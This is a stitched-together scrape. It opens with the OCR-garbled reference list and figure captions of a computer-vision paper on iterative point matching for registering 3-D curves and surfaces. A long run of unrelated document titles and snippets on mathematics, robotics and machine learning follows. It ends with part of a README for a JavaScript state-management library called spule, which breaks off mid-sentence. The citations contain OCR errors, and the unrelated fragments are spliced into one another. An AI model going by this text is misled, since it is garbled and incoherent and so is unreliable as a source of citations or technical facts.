within a Task to pass state between Subtasks. Goodbye 🍝 Code!Goodbye 🍝 Code! This gives new meaning to the term "side-effect" as - in spule - side-effects are kept on the side and out of the guts of your logic. This frees you from the pain that tight-coupling of state, side-effects and logic entails. Every feature is strongly decoupled from the others providing a DX that is versatile, modular and composable. TODO: IMAGE(s) ♻ Framework ArchitectureTODO: IMAGE(s) ♻ Framework Architecture Command KeysCommand Keys The SET_STATE Command (built-in) TODO Shorthand Symbols Glossary ( spule surface grammar) Now that we've seen some examples of Commands and Tasks in use, we'll use a shorthand syntax for describing Task/Command signatures as a compact conveyance when convenient. RouterRouter One of the things that can be really frustrating to users of some frameworks is either the lack of a built-in router or one that seems tacked-on after the fact. spule was built with the router in mind. spule provides two routers: - A DOM router (for clients/SPAs) - a data-only router (for servers/Node). 🔍 UTH: The DOM router is built on top of the data-only router. Both are implemented as Tasks. URL = LensURL = Lens What is a URL? It's really just a path to a specific resource or collection of resources. Before the glorious age of JavaScript, this - in fact - was the only way you could access the Internet. You typed in a URL, which pointed to some file within a directory stored on a computer at some specific address. Taking queues from the best parts of functional programming, spule's router is really just a lens into the application state. As natural as URLs are to remote resources, this router accesses local memory using paths At it's core the spule router doesn't do very much. It relies on a JavaScript Map implementation that retains the Map API, but has value semantics - rather than identity semantics (aka: PLOP), which the native Map implementation uses - for evaluating equality of a non-primitive Map keys (e.g., for Object/ Array keys). This - dare I say better - implementation of Map avails something that many are asking for in JS: pattern matching. With pattern matching, we don't have to resort to any non-intuitive/complex/fragile regular expression gymnastics for route matching. To start, we'll diverge away from the problem at hand for just a moment look at some of the benefits of a value-semantic Map... Value semantics have so many benefits. As a router, just one. So, how might we apply such a pattern matching solution against the problem of routing? // src/routes.js import { EquivMap } from "@thi.ng/associative" const known = x => ["fortunes", "lessons"].find(y => y === x) const four04 = [{ chinese: 404, english: 404 }] const home = [{ chinese: "家", english: "home" }] const url = "" const query = (a, b) => fetch(`${url}${a}?limit=1&skip=${b}`).then(r => r.json()) export const match = async path => { const args = path ? path.split("/") : [] let [api, id] = args const data = new EquivMap([ // prevent unneeded requests w/thunks (0)=> [[], () => home], [[known(api), id], () => query(api, id)], // guarded match [[known(api)], () => query(api, 1)] // guarded match ]).get(args) || (() => four04) // call the thunk to trigger the actual request const res = await data() const r = res[0] return r.message || `${r.chinese}: ${r.english}` } const log = console.log match("fortunes/88").then(log) // //=> "A handsome shoe often pinches the foot." match("").then(log) // //=> "家: home" match("lessons/4").then(log) // //=> "请给我一杯/两杯啤酒。: A beer/two beers, please." match("bloop/21").then(log) // //=> "404: 404" If you can see the potential of pattern matching for other problems you may have encountered, you can check out the more detailed section later. We can create pattern-matching guards by using an in situ expression that either returns a "falsy" value or the value itself. Even if you don't end up using spule, you may find the @thi.ng/associative library very handy! Now, let's integrate our router. Everything pretty much stays the same, but we'll need to make a few changes to mount our router to the DOM. // src/routes.js import { parse } from "spule" ... export const match = async path => { - const args = path ? path.split("/") : []; + const args = parse(path).URL_path let [api, id] = args const data = new EquivMap([ [[], () => home], [[known(api), id], () => query(api, id)], [[known(api)], () => query(api, 1)] ]).get(args) || (() => four04) const res = await data() const r = res[0] - return r.message || `${r.chinese}: ${r.english}` + return { + URL_data: r.message || `${r.chinese}: ${r.english}`, + } } - ... TODO It's beyond the scope of this introduction to spule to dive into the implementation of our next example. It will work, but you try it out for yourself on your own (toy) problem in order to get a feel for it. UI-first or UI-last?UI-first or UI-last? As you may deduce - if you've gotten this far - is there's a heavy data-oriented/biased approach taken by spule. In fact, we argue that the UI should be informed by the data, not the other way around. I.e., start with building out the application state for your various routes and then frame it with a UI. Think of the application state as your information architecture and the UI as your information interior design. While it's possible to start with the design and end with an information architecture, the customer journey can suffer from an over-reliance on "signage" for helping them navigate through the information. It's not uncommon to start an application/site design with a "site map". Think of this approach like a site map on steroids AdvancedAdvanced ADVANCED USE ONLY 👽 HURL tries to hide the stream implentation from the user as much as possible, but allows you to go further down the rabbit hole if so desired. You may send Commands to a separate stream of your own creation during a Task by using a nullary ("thunk") (0)=> function signature as the args value of a Command. If this is the case, the spool assumes the sub$ key references a stream and sends the return value of the thunk to that stream This feature can come in handy for "fire and forget" events (e.g., logging, analytics, etc.) import { stream } from "@thi.ng/rstream" import { map, comp } from "@thi.ng/transducers" // ad-hoc stream let login = stream().subscribe( comp( map(x => console.log("login ->", x)), map(({ token }) => loginToMyAuth(token)) ) ) // subtask ({A})=> let ANALYTICS = ({ token }) => [ { sub$: login, // <- stream // thunk custom stream dispatch (0)=> args: () => ({ token }) } ] // task let task = [ // no sub$, just pass data { args: { href: "" } }, { sub$: login, args: () => "logging in..." }, { sub$: "AUTH", args: ({ href }) => fetch(href).then(r => r.json()), erro: (acc, err) => ({ sub$: "cancel", args: err }), reso: (acc, res) => ({ token: res }) }, acc => ANALYTICS(acc), { sub$: login, args: () => "log in success" } ] Stream Architecture:Stream Architecture: run$ is the primary event stream exposed to the user via the ctx object injected into every hdom component the command stream is the only way the user changes anything in hurl Marble DiagramMarble Diagram 0>- |------c-----------c--[~a~b~a~]-a----c-> : calls 1>- |ps|---1-----------1----------0-1----1-> : run$ 2>- |t0|---------a~~b~~~~~~~~~~~a~|--------> : task$ 3>- |t1|---c-----------c------------a----c-> : command$ 4>- ---|ps|c-----a--b--c--------a---a----c-> : out$ Userland Handlers: a>- ---|ta|------*--------------*---*------> : registerCMD b>- ---|tb|---------*----------------------> : registerCMD c>- ---|tc|*-----------*-----------------*-> : registerCMD StreamsStreams 0>-: userland stream emmissions ( run) 1>-: pubsub forking stream (if emmission has a sub$) 2>-: pubsub = false? -> task$stream 3>-: pubsub = true? -> command$stream 4>-: pubsub emits to registerCMDbased on sub$value Handlers work 4>-this is the stream to which the user (and framework) attaches workhandlers. Handlers receive events they subscribe to as topics based on a sub$key in a Command object. Built-in Commands/Tasks:Built-in Commands/Tasks: SET_STATE: Global state update Command URL__ROUTE: Routing Task - "FLIP" : F.L.I.P. animations Commands for route/page transitiions run$ User-land event dispatch stream This stream is directly exposed to users. Any one-off Commands nexted into this stream are sent to the command$ stream. Arrays of Commands (Tasks) are sent to the task$ stream. Constants GlossaryConstants Glossary More Pattern MatchingMore Pattern Matching import { EquivMap } from "@thi.ng/associative" const haiku = args => { const { a, b, c } = args const [d] = c || [] const line = new EquivMap([ [{ a, b }, `${a} are ${b}`], [{ a, b, c: [d] }, `But ${a} they don't ${b} ${d}`] ]).get(args) || "refrigerator" console.log(line) } haiku({ a: "haikus", b: "easy" }) //=> haikus are easy haiku({ a: "sometimes", b: "make", c: ["sense"] }) //=> But sometimes they don't make sense haiku({ b: "butterfly", f: "cherry", a: "blossom" }) //=> refrigerator We can use any expression in the context of an Object as a guard. Let's see an example of guarding matches for Objects... let guarded_matcher = args => { let { a, c } = args let res = // for guards on objects use computed properties new EquivMap([ [{ a, [c > 3 && "c"]: c }, `${c} is greater than 3`], [{ a, [c < 3 && "c"]: c }, `${c} is less than 3`] ]).get(args) || "no match" console.log(res) } guarded_matcher({ a: "b", c: 2 }) //=> less than 3 guarded_matcher({ a: "b", c: 3 }) //=> no match guarded_matcher({ a: "b", c: 4 }) //=> greater than 3 - Naming Conventions: - constants: CAPITAL_SNAKE_CASE - generally accepted convention for constants in JS - used for defining Commands (as though they might cause side effects, their subscription names are constant - i.e., a signal for emphasising this aspect of a Command) - pure functions: snake_case - some novelty here due to pure functions acting like constants in that with the same input they always return the same output - impure functions: camelCase - regular side-effecty JS - Tasks: DOUBLE__UNDERSCORE__SNAKE__CASE - implies the inputs and outputs on either end of a Task - Tasks also should be treated as pure functions where the output is really just data (and lambdas). This is going in the direction of "code as data" - lots'o'examples CreditsCredits spule is built on the @thi.ng/umbrella ecosystem
https://www.skypack.dev/view/@-0/hdom
CC-MAIN-2021-04
refinedweb
2,447
62.58
I am looking for the cheapest way of automating the conversion of all the text files (tab-delimited) in a folder structure into .xls format, keeping the shape of columns and rows as it is. Currently I am on MacOS. Linux and Windows are available though. Edit: import xlwt import xlrd f = open('Text.txt', 'r+') row_list = [] for row in f: row_list.append(row.split()) column_list = zip(*row_list) workbook = xlwt.Workbook() worksheet = workbook.add_sheet('Sheet1') i = 0 for column in column_list: for item in range(len(column)): worksheet.write(item, i, column[item]) workbook.save('Excel.xls') i+=1 The easiest way would be to just rename all of the files from *.txt to *.xls. Excel will automatically partition the data, keeping the original shape. I'm not going to write your code for you, but here is a head start: os.listdir() os.path.isdir()and os.path.isfile()to see if each 'thing' you just found in your intial directory is a file or a directory, and act on accordingly os.rename()to rename a file and os.remove()to delete a file os.path.splitext()to split the files name and extension, or just file.endswith('.txt')to work on only the correct files
https://codedump.io/share/Ewp0F3Ki5bbQ/1/automate-conversion-txt-to-xls
CC-MAIN-2016-50
refinedweb
207
61.93
On Friday 26 November 2004 19:19, Hans Reiser wrote:>.> Regarding namespace unification + XPath:For files: cat /etc/passwd/[. = "joe"] should work like in XPath.But what to do with directories?Would 'cat /etc/[. = "passwd"]' output the contents of the passwd fileor does it mean to output the file '[. = "passwd"]'?If the first is the case then you have to prohibit filenames looking like '[foo bar]'.If the shells wouldn't like * for themself, I'd suggest something likecat /etc/*[. = "passwd"]This means: list all contents and show the ones where /etc/passwd/*[@shell = "/bin/tcsh"]/@shellI hope I'm not offending, but my impression is now thatXPath stuff fits better into some shell providinga XPath view of the filesystem, than into the kernel.--------------------------------------------------------------------What about mapping the contents of files into "pure" posix namespace?XML is basically a tree, too.Notes: 1) "...." below is the entry to reiser4 namespace.2) # denotes a shell commandFor example:# cd /etc/passwd/# ls -a *. .. .... joe root# cd joe# lsgid home passwd shell uid# cat shell/bin/tcsh# cd ../....# ls plugins I guess an implementation in reiser4 would require somemime-type/file extension dispatcher plus a specialdirectory plugin for each mime-type.-- lg, Chris-To unsubscribe from this list: send the line "unsubscribe linux-kernel" inthe body of a message to majordomo@vger.kernel.orgMore majordomo info at read the FAQ at
http://lkml.org/lkml/2004/11/26/56
CC-MAIN-2014-42
refinedweb
228
59.7
What is a namespace? using namespace std; As a C++ programmer, one often encounters the above statement i.e. using namespace std; below the header file declarations in C++ programs. Ever wondered why this statement is used? Well, you would have guessed this statement has something to do with a namespace that has the name std. What is a namespace, by the way? Why do we need namespaces? Here we shall explain all these things. What is a namespace? The term namespace refers to the mechanism used for logical grouping of identifiers i.e. the names of functions, variables etc. A namespace is declared as : namespace nmsp { data-type2 var1; data-type2 var2; return-type1 func1 () {} return-type2 func2 () {} } Here, nmsp is the name of the namespace we’ve defined; var1, var2 are two variables and func1 and func2 are two functions defined inside this namespace. For example, a sample namespace would be like namespace maths { double x; double y; double add (double a, double b) {return (a+b);} double subtract (double a, double b) {return (a-b);} double multiply (double a, double b) {return (a*b);} double divide (double a, double b) {return (a/b);} } When you include a statement like using namespace std; in your program, you’re specifying that the contents of that namespace would be available for use in that program without any prefix. If you don’t include this statement in your program, the identifiers that require this namespace will have to be accompanied by the prefix std::. Similarly, for other namespaces, the required prefix would be <namespace-name>::. In other words, a namespace named wcb requires its identifiers to have the prefix wcb:: (in case using namespace wcb; hasn’t been used in the program). See the following two examples to understand this. Example 1 – Without “using namespace std;” #include <iostream> int main() { cout<<“Hello World”; return 0; } The above example wouldn’t work. Why? cout is a part of the std namespace and you haven’t included std in your program. You would have to replace cout with std::cout in order to make your program work. Example 2 – With “using namespace std;” #include <iostream> using namespace std; int main() { cout<<“Hello World”; return 0; } The above program would work properly because you have included the required namespace. Why do we use namespaces? This is the most important question concerning namespaces. Why exactly do we need namespaces? There are mainly two reasons you might want to use namespaces. - First, namespaces can be used to group identifiers. Therefore, they can be used to group similar functions, say, user input functions in one namespace and output showing functions in another. For example, functions like getdata(), getval(), getinput() etc. can be put in a namespace named userinput. Similarly, functions like showdata(), putval(), output() etc. can be put in a namespace named output. - Second, they are used to prevent conflicts. If you’re using multiple libraries in your program, you might have to face name conflicts i.e. two or more identifiers having the same name. For example, suppose you have employed two libraries Add.lib and Subtract.lib in your program. Now, you face a problem. Both libraries have a function named Calculate(). Add.lib uses this function to add two numbers, while Subtract.lib uses it to subtract the smaller number from the greater number. Now suppose you make a function call to Calculate(). Which function will be called – the one from Add.lib or the one from Subtract.lib? To get rid of this ambiguity, we use namespaces in our programs. How to use namespaces in a C++ program? We have described namespaces and the reasons one should use them. But how do we use namespaces properly in our programs? It is quite simple. There are two ways to use the using….. statement in your program. - The first way is to include the entire namespace. This is done by writing using namespace <namespace name>; e.g. using namespace std; using namespace wcb; etc. In this case, you have included the entire namespace, so you can write all the identifiers of that namespace without using the <namespace-name>:: prefix. - The second way is to include only the identifiers you need. This is done by writing using <namespace-name>::identifier-name; e.g. using std::cout; using std::cin; etc. In this case, you have included only individual identifiers from a namespace, so you have to use the <namespace-name>:: prefix with all other identifiers. Many programmers recommend that you avoid the use of using…. statements. They say you should always write the full name of an identifier, such as std::cout. In my personal opinion, it is appropriate to use using namespace <namespace-name>; especially for long programs. The reason is obvious : Writing using namespace … statements makes it easier to focus on the actual coding process rather than having to remember all the namespaces and the identifiers they contain. We hope you liked reading this article. If you did, please let us know. 🙂 Thanks a lot for sharing! Nice article. I used to wonder why I have to use to using namespace std; Earlier I used Turbo C++ and didn’t need any such thing. But ever since I started using Visual Studio, I had to use this statement or my programs won’t work. Even those who recommended me to use this using .. statement didn’t explain why I had to use it. :)Thanks for sharing such informative post 🙂 😉 😀 🙂 A very detailed explanation of the namespaces..! That helped me a lot. I was just scratching my head over the confusing std:: and using namespace std; stuff. Now, it’s all clear to me. I’m glad C++ uses namespaces so little. In c#, the whole program is based on namespaces. OMG !
https://www.wincodebits.in/2015/09/what-is-a-namespace.html
CC-MAIN-2018-34
refinedweb
967
67.65
I'm trying to make an IList of the type Vector2. Why doesn't this work..? IList<Vector2> borderPixels; Do I have to import something? Are you trying to make a List(T)? That's under the System.Collections.Generic namespace. Answer by willparsons · Sep 09, 2015 at 08:18 AM Make you class inherit from System.Collections.Generic and change the datatype from IList to just List. List<Vector2> borderPixels = new List<Vector2>(); That should do the trick. Answer by FortisVenaliter · Sep 08, 2015 at 07:52 PM Because IList is an interface, not a class. Look up the interface keyword and abstraction/inheritance for more information, but you can never instantiate an abstract class or interface. You're probably looking for the List class instead. Right.So you can have your variable be declared as IList<Vector2> but you need an actual class instance. So you can do this: IList<Vector2> IList<Vector2> borderPixels = new List<Vector2>(); The List<T> class implements the IList<T> interface so you can assign a List<T> instance to a IList<T> variable. However you could use any other class that implements the IList<T> interface. Using the IList interface usually only makes sense if you write some framework / abstraction yourself where your class doesn't need to know the actual implementation. It just needs "some kind" of "list". List<T> IList<T> In most cases you would use directly the type List<T> List<Vector2> borderPixels = new List<Vector. How to read X and Y component ( of a vector2) from a list 1 Answer A node in a childnode? 1 Answer Converting a string into a type, then using that type in a script. 3 Answers Multiple Cars not working 1 Answer Neural Network type conversion problem 1 Answer
https://answers.unity.com/questions/1063765/how-to-make-an-ilist-of-a-certain-type.html
CC-MAIN-2020-50
refinedweb
298
66.33
MVC In this lab, you will learn about the Model-View-Controller (MVC) pattern as it is implemented by AngularJS. Part 1 – Setting Up The Environment Copy the mvc.html file over to the C:\Software\nginx\html\labs\ directory. Open the Command Prompt window and unless you are already in the C:\Software\nginx directory, type in the following command at the prompt and press ENTER:cd C:\Software\nginx Start the nginx web server by executing the following command:start nginx This command will launch the nginx web server that starts listening on port 80 ready to service your browser requests. Keep the Command Prompt window open. Part 2 – Understanding MVC Components Open Google Chrome browser and navigate to You should see the following content: Enter Bill Smith in the Enter person’s name input box and 30000 for the person’s income and click the Apply Tax button. You will be presented with the following screen with a pop up message dialog: As you can see, Bill Smith just lost 50% of his disposable income. Click OK in the pop-up message dialog. Let’s take a look at how AngularJS (not the Revenue Service, of course!) did that to Bill Smith. Open the C:\Software\nginx\html\labs\mvc.html file in your text editor. You should see the following content: <!doctype html> <html> <head> <title>MVC with AngularJS</title> <script src="/js/angular.js"></script> <script>); }; }); </script> </head> <body ng- Enter person's name : <input type="text" ng- <br> Enter person's income: <input type="number" ng- <p style="color: blue;">The income of [{{person.name}}] is $[{{person.income}}]</p> <button ng-Apply Tax</button> </body> </html> Let’s review the elements of the MVC pattern on the page. The model is presented by two JavaScript properties: person.name and person.income that are plugged into the framework by theng-modelattributes of the input HTML elements. For the person.income numeric value we use the number input element of HTML5 that helps with input filtering (any user input other than a number will be discarded). Note that we are using the dot ‘.’ notation to group properties (name and income) into a single “namespace” called person. This idiom helps build object.property hierarchies. The UI (View) of the page is represented by the DOM (the input HTML elements); the UI elements are mapped to the _person.name_and _person.income_JavaScript properties. The up-to-date state of our model is echoed back to the user in the p element. We are creating a controller called TaxCalculator. It will be the controller part of the MVC structure on our page. The controller contains the business logic of calculating and applying the tax (of the whopping 50%). The $scope parameter of the TaxCalculator constructorfunction is the context object passed in (or injected) by AngularJS. The $scope carries the model values updated in the View. The applyTax function represents the operation attached to our controller and it’s bound to the UI by way of the ng-click directive of the Apply Tax button. So, in essence, the MVC pattern is implemented in our AngularJS-driven page as follows: the View is the Document Object Model (DOM), the Controller is a JavaScript class, and the Model is the data stored in JavaScript variables or object properties. Keep the file open in the text editor as we are going to make changes to our AngularJS MVC application. Part 3 – Working with the MVC Components Currently, our MVC application has the tax rate hard-coded and set to 50% (taxRate = 0.5;). Let’s improve on this and make our application more flexible by exposing the tax rate to the user through the UI. In your text editor that holds the mvc.html file, locate the Enter person’s income: <input type=”number” . . . line and right below it enter the following statement in one line:The income tax rate (%): As a result, you should have the following updated content in this part of our web page: (content skipped for space ...) <br> Enter person's income: <input type="number" ng- <br> The income tax rate (%): <input type="number" ng- <p style="color: blue;">The income of [{{person.name}}] is $[{{person.income}}]</p> (content skipped for space ...) In the mvc.html file, locate the taxRate = 0.5; line and replace it with this content: var taxRate = $scope.tax.rate/100;</pre> As a result, you should have the following updated content in this part of our web page: (content skipped for space ...) $scope.applyTax = function() { var person = $scope.person.name; var income = $scope.person.income; var taxRate = $scope.tax.rate/100; var tax = income * taxRate; (content skipped for space ...) Save the file. Keep the file open in the text editor. Switch to Chrome and refresh the browser view by pressing Ctrl-R. You should see the following updated page content: Now you have the income tax rate control that adds flexibility to our application. Try out applying different income tax rates (the supported rates are 0% through 100%). Note: If you have a problem applying taxes (you don’t see a pop up dialog stating how much tax was grabbed (withheld) from the taxpayer), press Ctrl-Shift-J in Chrome to open the JavaScript console and see the exception (error) that prevented the controller’s applyTax operation from completing. You may see an error similar to this one: This error is the result of you entering the rate value that is in conflict with the defined number input range (input is beyond the [0 – 100] range, e.g. a negative value). You can click at any of the links in the console output to drill down and inspect what is happening under the hood. In our labs, we use angular.js at source level (not minimized for production) so you can get some insights into the workings of this framework. To hide the JavaScript console in Chrome press Ctrl-Shift-J again. Part 4 – Cleaning Up Close Chrome browser. about the Model-View-Controller (MVC) pattern as it is implemented by AngularJS.6 MVC With AngularJS was last modified: November 21st, 2017 by admin
https://www.webagesolutions.com/knowledgebase/kb006/kb006-mvc-with-angularjs/
CC-MAIN-2018-22
refinedweb
1,030
65.52
pthread_attr_setstackprealloc() Set the amount of memory to preallocate for a thread's MAP_LAZY stack Synopsis: #include <pthread.h> int pthread_attr_setstackprealloc( const pthread_attr_t * attr, size_t stacksize); Since: BlackBerry 10.0.0 Arguments: - attr - A pointer to the pthread_attr_t structure that defines the attributes to use when creating new threads. For more information, see pthread_attr_init(). - stacksize - The amount of stack you want to preallocate for new threads. Library: libc Use the -l c option to qcc to link against this library. This library is usually included automatically. Description: The pthread_attr_setstackprealloc() function sets the size of the memory to preallocate for a thread's MAP_LAZY stack. By default, the system allocates sysconf(_SC_PAGESIZE) bytes of physical memory for the initial stack reference. This function allows you to change this default memory size, if you know that a thread will need more stack space. Semantically, there is no difference in operation, but the memory manager attempts to make more efficient use of Memory Management Unit hardware (e.g. a larger page size in the page entry table) for the stack if it knows upfront that more memory will be required. Returns: - EOK - Success. Classification: Last modified: 2014-06-24 Got questions about leaving a comment? Get answers from our Disqus FAQ.comments powered by Disqus
http://developer.blackberry.com/native/reference/core/com.qnx.doc.neutrino.lib_ref/topic/p/pthread_attr_setstackprealloc.html
CC-MAIN-2016-18
refinedweb
211
50.23
I have two tables I would like to join together. One of them has a very bad skew of data. This is causing my spark job to not run in parallel as a majority of the work is done on one partition. I have heard and read and tried to implement salting my keys to increase the distribution. at 12:45 seconds is exactly what I would like to do. Any help or tips would be appreciated. Thanks! Yes you should use salted keys on the larger table (via randomization) and then replicate the smaller one / cartesian join it to the new salted one: Here are a couple of suggestions: Tresata skew join RDD python skew join: The tresata library looks like this: import com.tresata.spark.skewjoin.Dsl._ // for the implicits // skewjoin() method pulled in by the implicits rdd1.skewJoin(rdd2, defaultPartitioner(rdd1, rdd2), DefaultSkewReplication(1)).sortByKey(true).collect.toLis
https://codedump.io/share/n2c6sniQju0M/1/apache-spark-handling-skewed-data
CC-MAIN-2017-51
refinedweb
152
64.41
Hi Andrea, Sorry for the Inconvenience caused. We have analyzed the reported issue (When the Unobtrusive Support is turned off, the DatePickerFor renders as a simple textbox and not as the DatePicker) and we are not able to reproduce it. We have prepared a simple sample based on your requirement. You can also download the attached sample from the following location. In the above sample, we have used the DatePickerFor with the form. When we submit the form the selected date value is send in postback. The submitted date value displayed in the view page. We have also tried this with the grid sample. In this sample also we cannot reproduce the above reported issue. Both the controls are working fine. If you still face any problems, please revert back us the attached sample with replication procedure. So that we could provide the exact solution at earliest. Please let us know if you have any queries. Regards, Kaliswaran S public class Incident { public Incident() { TempContainer = new Container(); } DateTime dt = DateTime.Now; public DateTime datepicker1 { get; set; } public Container TempContainer { get; set; } } public class Container { public DateTime TempDate { get; set; } public Container() { TempDate = DateTime.Now.AddMonths(2); } } <div class="datepickerDiv"> @Html.EJ().DatePickerFor(model => model.datepicker1, (Syncfusion.JavaScript.Models.DatePickerProperties)ViewData["date"]) </div> <div class="datepickerDiv"> @Html.EJ().DatePickerFor(model => model.TempContainer.TempDate, (Syncfusion.JavaScript.Models.DatePickerProperties)ViewData["date"]) </div> Hi Andrea, Sorry about the Inconvenience caused. We are able to reproduce the reported issue (When I use two DatePickerFor in same page with different Properties, The first DatePicker renders correctly, the second is a simple Textbox). We have confirmed this as a defect and an issue report has been logged for this. Fix for this issue will be available in our upcoming service pack release for ASP.NET MVC which is expected to be rolled out at the end of this month (January 2015). We will notify you once our service pack release is rolled out. If you are in need of a solution sooner, then please let us know about this. So that we could provide a patch for this issue before service pack release. Please let us know if you have any queries. Regards, Kaliswaran S Hi Andrea, Thanks for your update. Query: I just noticed that the DatePickerFor problem appears even on the DropDownListFor. Maybe is a more general problem that happens with Other MVC Helpers. We have already validated the above reported issue for all “Form” controls not only for “DataPickerFor” and we will deliver the fix for all “Form” controls. Please let us know if you have any queries. Regards,Kaliswaran S This post will be permanently deleted. Are you sure you want to continue? Sorry, An error occured while processing your request. Please try again later.
https://www.syncfusion.com/forums/117907/datepickerfor
CC-MAIN-2018-47
refinedweb
462
58.89
a question in fixing this code alex lotel Ranch Hand Posts: 191 posted 8 years ago i noticed that A doesnt implement C it doesnt have print method i tried to fix it by adding public class A extends B implements C but it ssays that there is a bug in the superconstructor i cant understand what is the bug?? public class A implements C { int d=17; A(int d) { this.d=d; } A done() { System.out.println("I am done"); return this; } } public class B extends A { int a=1; int b=2; public B(int a, int b) { this(a); a=b; } public B(int b) { super(b); a=b; } public A done() { System.out.println("finished"); return this; } public void print(int a, int b, int c) { System.out.println("a=" +a); System.out.println("b=" +b); System.out.println("c=" +c); } } public interface C { public void print(int a, int b, int c); } public class MainClass { public static void main(String[] args) { B b=new B(7,11); b.print(b.a,b.b,b.d); A a= ((A)b).done(); } } alex lotel Ranch Hand Posts: 191 posted 8 years ago i was told that another way is to write abstract on class A but i cant understand it meening because abstract is just an interface with the possibility of including a finish method not just the signatures like interface ?? S Reddy Ranch Hand Posts: 45 posted. Post Reply Bookmark Topic Watch Topic New Topic Similar Threads a question about super command a bug with a constructor a certain bug i cant understand.. a problem with the resolt of the code how to be a human compiler
http://www.coderanch.com/t/409483/java/java/fixing-code
CC-MAIN-2016-26
refinedweb
282
61.16
ADO.NET 2.0 support The ADO.NET driver has been updated to support version 2.0 of the .NET framework. Several new classes and methods have been added as part of this support. See iAnywhere.Data.SQLAnywhere namespace (.NET 2.0). SQL Anywhere Explorer The SQL Anywhere Explorer lets you connect to SQL Anywhere databases from within Visual Studio .NET. In addition, you can open Sybase Central and Interactive SQL directly from Visual Studio .NET. See Working with database connections in Visual Studio. iAnywhere JDBC driver supports JDBC 3.0 The iAnywhere JDBC driver now supports JDBC 3.0 calls. The iAnywhere JDBC driver no longer supports JDBC 2.0. Both the ianywhere.ml.jdbcodbc.IDriver and ianywhere.ml.jdbcodbc.jdbc3.IDriver classes are still supported to allow existing applications to continue running without modification, but, both drivers are now identical and implement JDBC 3.0 only. You can no longer use JRE versions earlier than 1.4 with the iAnywhere JDBC driver. See Introduction to JDBC. iAnywhere JDBC driver supports the SQL Server Native Client ODBC driver The iAnywhere JDBC driver now checks if the ODBC driver is the Microsoft SQL Server Native Client ODBC driver and appropriately sets the default result set type and other attributes. Support for PreparedStatement.addBatch method The iAnywhere JDBC driver now supports the PreparedStatement.addBatch method. This method is useful for performing batched (or wide) inserts. Support for SQL_GUID added to ODBC driver Support for UNIQUEIDENTIFIER columns has now been added to the SQL Anywhere ODBC driver. A UNIQUEIDENTIFIER column can now be typed as SQL_GUID. Support for GUID escape sequences added to ODBC driver Support for GUID escape sequences has been added to the SQL Anywhere ODBC driver. GUID escape sequences may be used in SQL statements prepared and executed through ODBC. A GUID escape sequence has the form {guid 'nnnnnnnn-nnnn-nnnn-nnnn-nnnnnnnnnnnn'}. ODBC message callbacks are now per-connection ODBC has supported message callbacks since Adaptive Server Anywhere version 9.0.0, but messages for all connections came to a single callback function. As of version 9.0.2, when you designate a message callback function, it applies only to a single connection. This is consistent with how DBLIB works. All messages now funnel through a single function in the ODBC driver, which filters the messages by connection, and only calls the connection's callback function for those connections that have one. New functions added to the SQL Anywhere PHP module The following new functions have been added to the SQL Anywhere PHP module: In addition, two new options have been added to the sqlanywhere_set_option function: verbose_errors and row_counts. See SQL Anywhere PHP API reference. Enhancements to db_locate_servers_ex function The db_locate_servers_ex function supports two new flags: DB_LOOKUP_FLAG_ADDRESS_INCLUDES_PORT, which returns the TCP/IP port number in the a_server_address structure passed to the callback function, and DB_LOOKUP_FLAG_DATABASES, which indicates that the callback function is called once for each database or database server that is found. See db_locate_servers_ex function. Perl DBD::ASAny driver for the Perl DBI module renamed The Perl driver has been renamed from DBD::ASAny to DBD::SQLAnywhere. Perl scripts that use SQL Anywhere must be changed to use the new driver name. The cursor attribute ASATYPE, which returns native SQL Anywhere types has not changed, and neither have the type names (ASA_STRING, ASA_FIXCHAR, ASA_LONGVARCHAR, and so on). See SQL Anywhere Perl DBD::SQLAnywhere DBI module. SQL preprocessor (sqlpp) -o option values The sqlpp -o option now accepts WINDOWS rather than WINNT for Microsoft Windows. As well, you can specify UNIX64 for supported 64-bit Unix operating systems. See SQL preprocessor. ODBC driver manager enhancements The ODBC Driver Manager now supports: all ODBC 3.x calls, wide CHAR entry points, tracing of connections. In addition, the ODBC Driver Manager is now able to switch between a non-threaded or threaded SQL Anywhere driver. ODBC Driver Manager can now be used by both threaded and non-threaded applications The ODBC Driver Manager can now be used by both threaded and non-threaded applications. Deployment wizard The Deployment wizard has been added for creating deployments of SQL Anywhere for Windows. The Deployment wizard can be used to create both Microsoft Windows Installer package files and Microsoft Windows Installer Merge Module files. The InstallShield merge modules and templates provided with previous versions of SQL Anywhere are no longer supplied. Instead, use the Deployment wizard to create SQL Anywhere deployments. See Using the Deployment Wizard.
http://dcx.sap.com/1101/en/sachanges_en11/newjasper-s-3641153.html
CC-MAIN-2017-39
refinedweb
743
57.47
Important: Please read the Qt Code of Conduct - QtCreator debugger not behaving deterministically - Karlovsky120 last edited by I'm trying to debug a Qt application, but I'm having several issues. Firstly, when I hit a breakpoint (or when the program gets to a stationary state (open window waiting for user input)) the application output just stops. Mid string, with 30 more strings in the buffer. I've tried flushing the buffer before the breakpoint, but to no avail. Secondly, I have bugs that disappear when I place breakpoints at a certain part of the code (mainly somewhere prior to the bug). I've tried this on three different machines, Macbook Air (early 2015, Mojave), iMac (27", late 2013, Catalina) and a hackintosh VM (Catalina). Other colleagues are working on the same project, nobody else has the problem. My WTR on iMac has literally been, install the OS, download QtCreator, install QtCreator, clone the project repository, run the debug build. I never changed the default kits or any settings in the QtCreator. My current working theory is that Apple has my picture, hates me and makes macs act stupid if they detect me in front of them. I have no other theories that would make more sense at this point, so I'm open for any suggestions. @Karlovsky120 said in QtCreator debugger not behaving deterministically: Other colleagues are working on the same project, nobody else has the problem. That's worrying :( Especially if you say you try it on different machines and it only goes wrong for you. My current working theory is that Apple has my picture, hates me and makes macs act stupid if they detect me in front of them If what you describe is true, this seems like the most likely explanation ;-) One thing you should certainly do is make sure the "debug" folder is absolutely empty before you do a full rebuild. Any artefacts lying around could result in odd behaviour. I don't know how it works on Mac, but make sure your compiler/debugger themselves are correctly installed, can they be uninstalled/reinstalled? Secondly, I have bugs that disappear when I place breakpoints at a certain part of the code (mainly somewhere prior to the bug). Unfortunately, this is actually not totally impossible/incorrect. For example, this has happened to me in Qt code to do with signals/slots because of timing code buried in Qt which causes different behaviour in debugger against not in debugger, or how you actually step through in debugger. Also "uninitialized/incorrect" memory data can show up in different ways as you debug/run your code, and in that sense you should regard it as causing potentially "non-deterministic" behaviour. I hope I'm not speaking out of turn, but from what you describe (especially with it working for other people, but not working for you across multiple machines) I don't see how anyone reading this will be able to pinpoint your problem, I'm afraid? However, you might state the exact versions of Qt/Qt Creator/compiler/debugger you are using in case those are relevant. Oh, and does the "bad debugger" happen to you on a minimal project (e.g. a "Hello 